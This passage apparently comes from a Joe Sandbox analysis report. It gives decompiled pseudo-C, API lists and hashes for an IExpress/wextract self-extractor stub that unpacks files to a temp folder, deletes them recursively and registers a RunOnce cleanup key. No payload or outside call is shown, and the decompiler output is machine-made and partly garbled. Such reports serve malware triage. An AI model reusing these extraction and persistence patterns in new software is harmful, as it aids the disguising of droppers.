                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                          • String ID: *MEMCAB$CABINET
                                                          • API String ID: 1305606123-2642027498
                                                          • Opcode ID: 8f44ee0308ec89386dced5dc9c565b748628a9e0945d52f87502ed3bbf12dec6
                                                          • Instruction ID: 91ddcd46e560a0c36789685a5a7206561d0659ab452dcd365d2f503b579b2db0
                                                          • Opcode Fuzzy Hash: 8f44ee0308ec89386dced5dc9c565b748628a9e0945d52f87502ed3bbf12dec6
                                                          • Instruction Fuzzy Hash: AE31E6B4740215AFE7305B6AAC9EF6F3A9CB784F85F04405DBDC1D6189E6BE98008F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 406 10c2f1d-10c2f3d 407 10c2f6c-10c2f73 call 10c5164 406->407 408 10c2f3f-10c2f46 406->408 417 10c2f79-10c2f80 call 10c55a0 407->417 418 10c3041 407->418 409 10c2f5f-10c2f66 call 10c3a3f 408->409 410 10c2f48 call 10c51e5 408->410 409->407 409->418 415 10c2f4d-10c2f4f 410->415 415->418 420 10c2f55-10c2f5d 415->420 417->418 425 10c2f86-10c2fbe GetSystemDirectoryA call 10c658a LoadLibraryA 417->425 419 10c3043-10c3053 call 10c6ce0 418->419 420->407 420->409 428 10c2ff7-10c3004 FreeLibrary 425->428 429 10c2fc0-10c2fd4 GetProcAddress 425->429 431 10c3006-10c300c 428->431 432 10c3017-10c3024 SetCurrentDirectoryA 428->432 429->428 430 10c2fd6-10c2fee DecryptFileA 429->430 430->428 441 10c2ff0-10c2ff5 430->441 431->432 433 10c300e call 10c621e 431->433 434 10c3054-10c305a 432->434 435 10c3026-10c303c call 10c44b9 call 10c6285 432->435 445 10c3013-10c3015 433->445 437 10c305c call 10c3b26 434->437 438 10c3065-10c306c 434->438 435->418 447 10c3061-10c3063 437->447 443 10c307c-10c3089 438->443 444 10c306e-10c3075 call 10c256d 438->444 441->428 449 10c308b-10c3091 443->449 450 10c30a1-10c30a9 443->450 455 10c307a 444->455 445->418 445->432 447->418 447->438 449->450 456 10c3093 call 10c3ba2 449->456 453 10c30ab-10c30ad 450->453 454 10c30b4-10c30b7 450->454 453->454 458 10c30af call 10c4169 453->458 454->419 455->443 459 10c3098-10c309a 456->459 458->454 459->418 461 10c309c 459->461 461->450
                                                          C-Code - Quality: 82%
                                                          			E010C2F1D(void* __ecx, int __edx) {
                                                          				signed int _v8;
                                                          				char _v272;
                                                          				_Unknown_base(*)()* _v276;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t9;
                                                          				void* _t11;
                                                          				struct HWND__* _t12;
                                                          				void* _t14;
                                                          				int _t21;
                                                          				signed int _t22;
                                                          				signed int _t25;
                                                          				intOrPtr* _t26;
                                                          				signed int _t27;
                                                          				void* _t30;
                                                          				_Unknown_base(*)()* _t31;
                                                          				void* _t34;
                                                          				struct HINSTANCE__* _t36;
                                                          				intOrPtr _t41;
                                                          				intOrPtr* _t44;
                                                          				signed int _t46;
                                                          				int _t47;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          
                                                          				_t43 = __edx;
                                                          				_t9 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t9 ^ _t46;
                                                          				if( *0x10c8a38 != 0) {
                                                          					L5:
                                                          					_t11 = E010C5164(_t52);
                                                          					_t53 = _t11;
                                                          					if(_t11 == 0) {
                                                          						L16:
                                                          						_t12 = 0;
                                                          						L17:
                                                          						return E010C6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                          					}
                                                          					_t14 = E010C55A0(_t53); // executed
                                                          					if(_t14 == 0) {
                                                          						goto L16;
                                                          					} else {
                                                          						_t45 = 0x105;
                                                          						GetSystemDirectoryA( &_v272, 0x105);
                                                          						_t43 = 0x105;
                                                          						_t40 =  &_v272;
                                                          						E010C658A( &_v272, 0x105, "advapi32.dll");
                                                          						_t36 = LoadLibraryA( &_v272);
                                                          						_t44 = 0;
                                                          						if(_t36 != 0) {
                                                          							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                          							_v276 = _t31;
                                                          							if(_t31 != 0) {
                                                          								_t45 = _t47;
                                                          								_t40 = _t31;
                                                          								 *0x10ca288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                          								_v276();
                                                          								if(_t47 != _t47) {
                                                          									_t40 = 4;
                                                          									asm("int 0x29");
                                                          								}
                                                          							}
                                                          						}
                                                          						FreeLibrary(_t36);
                                                          						_t58 =  *0x10c8a24 - _t44; // 0x0
                                                          						if(_t58 != 0) {
                                                          							L14:
                                                          							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                          							if(_t21 != 0) {
                                                          								__eflags =  *0x10c8a2c - _t44; // 0x0
                                                          								if(__eflags != 0) {
                                                          									L20:
                                                          									__eflags =  *0x10c8d48 & 0x000000c0;
                                                          									if(( *0x10c8d48 & 0x000000c0) == 0) {
                                                          										_t41 =  *0x10c9a40; // 0x3, executed
                                                          										_t26 = E010C256D(_t41); // executed
                                                          										_t44 = _t26;
                                                          									}
                                                          									_t22 =  *0x10c8a24; // 0x0
                                                          									 *0x10c9a44 = _t44;
                                                          									__eflags = _t22;
                                                          									if(_t22 != 0) {
                                                          										L26:
                                                          										__eflags =  *0x10c8a38;
                                                          										if( *0x10c8a38 == 0) {
                                                          											__eflags = _t22;
                                                          											if(__eflags == 0) {
                                                          												E010C4169(__eflags);
                                                          											}
                                                          										}
                                                          										_t12 = 1;
                                                          										goto L17;
                                                          									} else {
                                                          										__eflags =  *0x10c9a30 - _t22; // 0x0
                                                          										if(__eflags != 0) {
                                                          											goto L26;
                                                          										}
                                                          										_t25 = E010C3BA2(); // executed
                                                          										__eflags = _t25;
                                                          										if(_t25 == 0) {
                                                          											goto L16;
                                                          										}
                                                          										_t22 =  *0x10c8a24; // 0x0
                                                          										goto L26;
                                                          									}
                                                          								}
                                                          								_t27 = E010C3B26(_t40, _t44);
                                                          								__eflags = _t27;
                                                          								if(_t27 == 0) {
                                                          									goto L16;
                                                          								}
                                                          								goto L20;
                                                          							}
                                                          							_t43 = 0x4bc;
                                                          							E010C44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                          							 *0x10c9124 = E010C6285();
                                                          							goto L16;
                                                          						}
                                                          						_t59 =  *0x10c9a30 - _t44; // 0x0
                                                          						if(_t59 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						_t30 = E010C621E(); // executed
                                                          						if(_t30 == 0) {
                                                          							goto L16;
                                                          						}
                                                          						goto L14;
                                                          					}
                                                          				}
                                                          				_t49 =  *0x10c8a24;
                                                          				if( *0x10c8a24 != 0) {
                                                          					L4:
                                                          					_t34 = E010C3A3F(_t51);
                                                          					_t52 = _t34;
                                                          					if(_t34 == 0) {
                                                          						goto L16;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          				if(E010C51E5(_t49) == 0) {
                                                          					goto L16;
                                                          				}
                                                          				_t51 =  *0x10c8a38;
                                                          				if( *0x10c8a38 != 0) {
                                                          					goto L5;
                                                          				}
                                                          				goto L4;
                                                          			}

                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C2F93
                                                          • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010C2FB2
                                                          • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010C2FC6
                                                          • DecryptFileA.ADVAPI32 ref: 010C2FE6
                                                          • FreeLibrary.KERNEL32(00000000), ref: 010C2FF8
                                                          • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C301C
                                                            • Part of subcall function 010C51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010C2F4D,?,00000002,00000000), ref: 010C5201
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                          • API String ID: 2126469477-3123416969
                                                          • Opcode ID: a8bec83dea27d3997e8dc73512494397af052bc913a29364a2bddc1ea822983d
                                                          • Instruction ID: d7b598bbf8f4fa917c73a95d7d226fb348254c5049ef998bb5c6d1d24b834084
                                                          • Opcode Fuzzy Hash: a8bec83dea27d3997e8dc73512494397af052bc913a29364a2bddc1ea822983d
                                                          • Instruction Fuzzy Hash: C941EC316102068EEB71AB7D9C5469E37E4FB54F44F2080ADBEC1C6545EB79C580CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 478 10c5467-10c5484 479 10c551c-10c5528 call 10c1680 478->479 480 10c548a-10c5490 call 10c53a1 478->480 484 10c552d-10c5539 call 10c58c8 479->484 483 10c5495-10c5497 480->483 485 10c549d-10c54c0 call 10c1781 483->485 486 10c5581-10c5583 483->486 493 10c554d-10c5552 484->493 494 10c553b-10c5545 CreateDirectoryA 484->494 495 10c550c-10c551a call 10c658a 485->495 496 10c54c2-10c54d8 GetSystemInfo 485->496 489 10c558d-10c559d call 10c6ce0 486->489 500 10c5554-10c5557 call 10c597d 493->500 501 10c5585-10c558b 493->501 498 10c5577-10c557c call 10c6285 494->498 499 10c5547 494->499 495->484 504 10c54fe 496->504 505 10c54da-10c54dd 496->505 498->486 499->493 507 10c555c-10c555e 500->507 501->489 508 10c5503-10c5507 call 10c658a 504->508 511 10c54df-10c54e2 505->511 512 10c54f7-10c54fc 505->512 507->501 513 10c5560-10c5566 507->513 508->495 515 10c54e4-10c54e7 511->515 516 10c54f0-10c54f5 511->516 512->508 513->486 517 10c5568-10c5575 RemoveDirectoryA 513->517 515->495 518 10c54e9-10c54ee 515->518 516->508 517->486 518->508
                                                          C-Code - Quality: 75%
                                                          			E010C5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				struct _SYSTEM_INFO _v304;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t10;
                                                          				void* _t13;
                                                          				intOrPtr _t14;
                                                          				void* _t16;
                                                          				void* _t20;
                                                          				signed int _t26;
                                                          				void* _t28;
                                                          				void* _t29;
                                                          				CHAR* _t48;
                                                          				signed int _t49;
                                                          				intOrPtr _t61;
                                                          
                                                          				_t10 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t10 ^ _t49;
                                                          				_push(__ecx);
                                                          				if(__edx == 0) {
                                                          					_t48 = 0x10c91e4;
                                                          					_t42 = 0x104;
                                                          					E010C1680(0x10c91e4, 0x104);
                                                          					L14:
                                                          					_t13 = E010C58C8(_t48); // executed
                                                          					if(_t13 != 0) {
                                                          						L17:
                                                          						_t42 = _a4;
                                                          						if(_a4 == 0) {
                                                          							L23:
                                                          							 *0x10c9124 = 0;
                                                          							_t14 = 1;
                                                          							L24:
                                                          							return E010C6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                          						}
                                                          						_t16 = E010C597D(_t48, _t42, 1, 0); // executed
                                                          						if(_t16 != 0) {
                                                          							goto L23;
                                                          						}
                                                          						_t61 =  *0x10c8a20; // 0x0
                                                          						if(_t61 != 0) {
                                                          							 *0x10c8a20 = 0;
                                                          							RemoveDirectoryA(_t48);
                                                          						}
                                                          						L22:
                                                          						_t14 = 0;
                                                          						goto L24;
                                                          					}
                                                          					if(CreateDirectoryA(_t48, 0) == 0) {
                                                          						 *0x10c9124 = E010C6285();
                                                          						goto L22;
                                                          					}
                                                          					 *0x10c8a20 = 1;
                                                          					goto L17;
                                                          				}
                                                          				_t42 =  &_v268;
                                                          				_t20 = E010C53A1(__ecx,  &_v268); // executed
                                                          				if(_t20 == 0) {
                                                          					goto L22;
                                                          				}
                                                          				_push(__ecx);
                                                          				_t48 = 0x10c91e4;
                                                          				E010C1781(0x10c91e4, 0x104, __ecx,  &_v268);
                                                          				if(( *0x10c9a34 & 0x00000020) == 0) {
                                                          					L12:
                                                          					_t42 = 0x104;
                                                          					E010C658A(_t48, 0x104, 0x10c1140);
                                                          					goto L14;
                                                          				}
                                                          				GetSystemInfo( &_v304);
                                                          				_t26 = _v304.dwOemId & 0x0000ffff;
                                                          				if(_t26 == 0) {
                                                          					_push("i386");
                                                          					L11:
                                                          					E010C658A(_t48, 0x104);
                                                          					goto L12;
                                                          				}
                                                          				_t28 = _t26 - 1;
                                                          				if(_t28 == 0) {
                                                          					_push("mips");
                                                          					goto L11;
                                                          				}
                                                          				_t29 = _t28 - 1;
                                                          				if(_t29 == 0) {
                                                          					_push("alpha");
                                                          					goto L11;
                                                          				}
                                                          				if(_t29 != 1) {
                                                          					goto L12;
                                                          				}
                                                          				_push("ppc");
                                                          				goto L11;
                                                          			}





















                                                          APIs
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C54C9
                                                          • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C553D
                                                          • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C556F
                                                            • Part of subcall function 010C53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C53FB
                                                            • Part of subcall function 010C53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5402
                                                            • Part of subcall function 010C53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C541F
                                                            • Part of subcall function 010C53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C542B
                                                            • Part of subcall function 010C53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5434
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                          • API String ID: 1979080616-3703068183
                                                          • Opcode ID: c6a48293d58c7de5eed960e3595fd28b54449f37aa4bba8cca9c6eafdc5a334a
                                                          • Instruction ID: d726efb0abebb585e10b9bef779c2fce5dbdf75b38f4d0fd6c0434182d56045a
                                                          • Opcode Fuzzy Hash: c6a48293d58c7de5eed960e3595fd28b54449f37aa4bba8cca9c6eafdc5a334a
                                                          • Instruction Fuzzy Hash: 01316974B002059FDB209B2E9C549BF77DBABF5F44B04416EA9C1D3284DB75EA018F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 86%
                                                          			E010C2390(CHAR* __ecx) {
                                                          				signed int _v8;
                                                          				char _v276;
                                                          				char _v280;
                                                          				char _v284;
                                                          				struct _WIN32_FIND_DATAA _v596;
                                                          				struct _WIN32_FIND_DATAA _v604;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t21;
                                                          				int _t36;
                                                          				void* _t46;
                                                          				void* _t62;
                                                          				void* _t63;
                                                          				CHAR* _t65;
                                                          				void* _t66;
                                                          				signed int _t67;
                                                          				signed int _t69;
                                                          
                                                          				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                          				_t21 =  *0x10c8004; // 0x4b13cf70
                                                          				_t22 = _t21 ^ _t69;
                                                          				_v8 = _t21 ^ _t69;
                                                          				_t65 = __ecx;
                                                          				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                          					L10:
                                                          					_pop(_t62);
                                                          					_pop(_t66);
                                                          					_pop(_t46);
                                                          					return E010C6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                          				} else {
                                                          					E010C1680( &_v276, 0x104, __ecx);
                                                          					_t58 = 0x104;
                                                          					E010C16B3( &_v280, 0x104, "*");
                                                          					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                          					_t63 = _t22;
                                                          					if(_t63 == 0xffffffff) {
                                                          						goto L10;
                                                          					} else {
                                                          						goto L3;
                                                          					}
                                                          					do {
                                                          						L3:
                                                          						_t58 = 0x104;
                                                          						E010C1680( &_v276, 0x104, _t65);
                                                          						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                          							_t58 = 0x104;
                                                          							E010C16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                          							SetFileAttributesA( &_v280, 0x80);
                                                          							DeleteFileA( &_v280);
                                                          						} else {
                                                          							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                          								E010C16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                          								_t58 = 0x104;
                                                          								E010C658A( &_v280, 0x104, 0x10c1140);
                                                          								E010C2390( &_v284);
                                                          							}
                                                          						}
                                                          						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                          					} while (_t36 != 0);
                                                          					FindClose(_t63); // executed
                                                          					_t22 = RemoveDirectoryA(_t65); // executed
                                                          					goto L10;
                                                          				}
                                                          			}






















                                                          APIs
                                                          • FindFirstFileA.KERNELBASE(?,010C8A3A,010C11F4,010C8A3A,00000000,?,?), ref: 010C23F6
                                                          • lstrcmpA.KERNEL32(?,010C11F8), ref: 010C2427
                                                          • lstrcmpA.KERNEL32(?,010C11FC), ref: 010C243B
                                                          • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010C2495
                                                          • DeleteFileA.KERNEL32(?), ref: 010C24A3
                                                          • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010C24AF
                                                          • FindClose.KERNELBASE(00000000), ref: 010C24BE
                                                          • RemoveDirectoryA.KERNELBASE(010C8A3A), ref: 010C24C5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                          • String ID:
                                                          • API String ID: 836429354-0
                                                          • Opcode ID: bac33497a8490eec3fe3d9d1a12a5f9e4bab8c5e095bc1628fa47a3797f63709
                                                          • Instruction ID: b0c107ac703fb167a0af4101c0974160ab6aa755077f5eea07d9be330e21a2af
                                                          • Opcode Fuzzy Hash: bac33497a8490eec3fe3d9d1a12a5f9e4bab8c5e095bc1628fa47a3797f63709
                                                          • Instruction Fuzzy Hash: 88316031604645DFD330EBA4CC88AEFB7E8ABC8B45F14492DA9D587280EF7995098F52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 70%
                                                          			E010C2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				long _t4;
                                                          				void* _t6;
                                                          				intOrPtr _t7;
                                                          				void* _t9;
                                                          				struct HINSTANCE__* _t12;
                                                          				intOrPtr* _t17;
                                                          				signed char _t19;
                                                          				intOrPtr* _t21;
                                                          				void* _t22;
                                                          				void* _t24;
                                                          				intOrPtr _t32;
                                                          
                                                          				_t4 = GetVersion();
                                                          				if(_t4 >= 0 && _t4 >= 6) {
                                                          					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                          					if(_t12 != 0) {
                                                          						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                          						if(_t21 != 0) {
                                                          							_t17 = _t21;
                                                          							 *0x10ca288(0, 1, 0, 0);
                                                          							 *_t21();
                                                          							_t29 = _t24 - _t24;
                                                          							if(_t24 != _t24) {
                                                          								_t17 = 4;
                                                          								asm("int 0x29");
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t20 = _a12;
                                                          				_t18 = _a4;
                                                          				 *0x10c9124 = 0;
                                                          				if(E010C2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                          					_t9 = E010C2F1D(_t18, _t20); // executed
                                                          					_t22 = _t9; // executed
                                                          					E010C52B6(0, _t18, _t21, _t22); // executed
                                                          					if(_t22 != 0) {
                                                          						_t32 =  *0x10c8a3a; // 0x0
                                                          						if(_t32 == 0) {
                                                          							_t19 =  *0x10c9a2c; // 0x0
                                                          							if((_t19 & 0x00000001) != 0) {
                                                          								E010C1F90(_t19, _t21, _t22);
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_t6 =  *0x10c8588; // 0x0
                                                          				if(_t6 != 0) {
                                                          					CloseHandle(_t6);
                                                          				}
                                                          				_t7 =  *0x10c9124; // 0x0
                                                          				return _t7;
                                                          			}



















                                                          APIs
                                                          • GetVersion.KERNEL32(?,00000002,00000000,?,010C6BB0,010C0000,00000000,00000002,0000000A), ref: 010C2C03
                                                          • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010C6BB0,010C0000,00000000,00000002,0000000A), ref: 010C2C18
                                                          • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010C2C28
                                                          • CloseHandle.KERNEL32(00000000,?,?,010C6BB0,010C0000,00000000,00000002,0000000A), ref: 010C2C98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Handle$AddressCloseModuleProcVersion
                                                          • String ID: HeapSetInformation$Kernel32.dll
                                                          • API String ID: 62482547-3460614246
                                                          • Opcode ID: 3e15d389af2a74bb8c4f680a035136833ff210e1d15825242967402a24fae714
                                                          • Instruction ID: 924aecbdd5bcd843a263fb04cff925d6a57923b1e2d6d86e556bb19aafaa00c2
                                                          • Opcode Fuzzy Hash: 3e15d389af2a74bb8c4f680a035136833ff210e1d15825242967402a24fae714
                                                          • Instruction Fuzzy Hash: A7118A7130020D9FE7306BF998C8A6F3B999B84F94B04406DFAC5D7685DA3AD8419F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C6F40() {
                                                          
                                                          				SetUnhandledExceptionFilter(E010C6EF0); // executed
                                                          				return 0;
                                                          			}



                                                          0x010c6f45
                                                          0x010c6f4d

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010C6F45
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 955f56049bbe72be1d4ea36d49e9b074ed2d3e7a35b0cd8cbe3fe5745dc53214
                                                          • Instruction ID: e50ee1b9549d8d404b405a09bc8a2403e5b56de104fedff3cd5fcf5ff72831f7
                                                          • Opcode Fuzzy Hash: 955f56049bbe72be1d4ea36d49e9b074ed2d3e7a35b0cd8cbe3fe5745dc53214
                                                          • Instruction Fuzzy Hash: AC9002703511048B97301BB1991941975915A8DA427825469A491C9548EB6640405E12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 93%
                                                          			E010C202A(struct HINSTANCE__* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				char _v528;
                                                          				void* _v532;
                                                          				int _v536;
                                                          				int _v540;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				long _t36;
                                                          				long _t41;
                                                          				struct HINSTANCE__* _t46;
                                                          				intOrPtr _t49;
                                                          				intOrPtr _t50;
                                                          				CHAR* _t54;
                                                          				void _t56;
                                                          				signed int _t66;
                                                          				intOrPtr* _t72;
                                                          				void* _t73;
                                                          				void* _t75;
                                                          				void* _t80;
                                                          				intOrPtr* _t81;
                                                          				void* _t86;
                                                          				void* _t87;
                                                          				void* _t90;
                                                          				_Unknown_base(*)()* _t91;
                                                          				signed int _t93;
                                                          				void* _t94;
                                                          				void* _t95;
                                                          
                                                          				_t79 = __edx;
                                                          				_t28 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t28 ^ _t93;
                                                          				_t84 = 0x104;
                                                          				memset( &_v268, 0, 0x104);
                                                          				memset( &_v528, 0, 0x104);
                                                          				_t95 = _t94 + 0x18;
                                                          				_t66 = 0;
                                                          				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                          				if(_t36 != 0) {
                                                          					L24:
                                                          					return E010C6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                          				}
                                                          				_push(_t86);
                                                          				_t87 = 0;
                                                          				while(1) {
                                                          					E010C171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                          					_t95 = _t95 + 0x10;
                                                          					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                          					if(_t41 != 0) {
                                                          						break;
                                                          					}
                                                          					_t87 = _t87 + 1;
                                                          					if(_t87 < 0xc8) {
                                                          						continue;
                                                          					}
                                                          					break;
                                                          				}
                                                          				if(_t87 != 0xc8) {
                                                          					GetSystemDirectoryA( &_v528, _t84);
                                                          					_t79 = _t84;
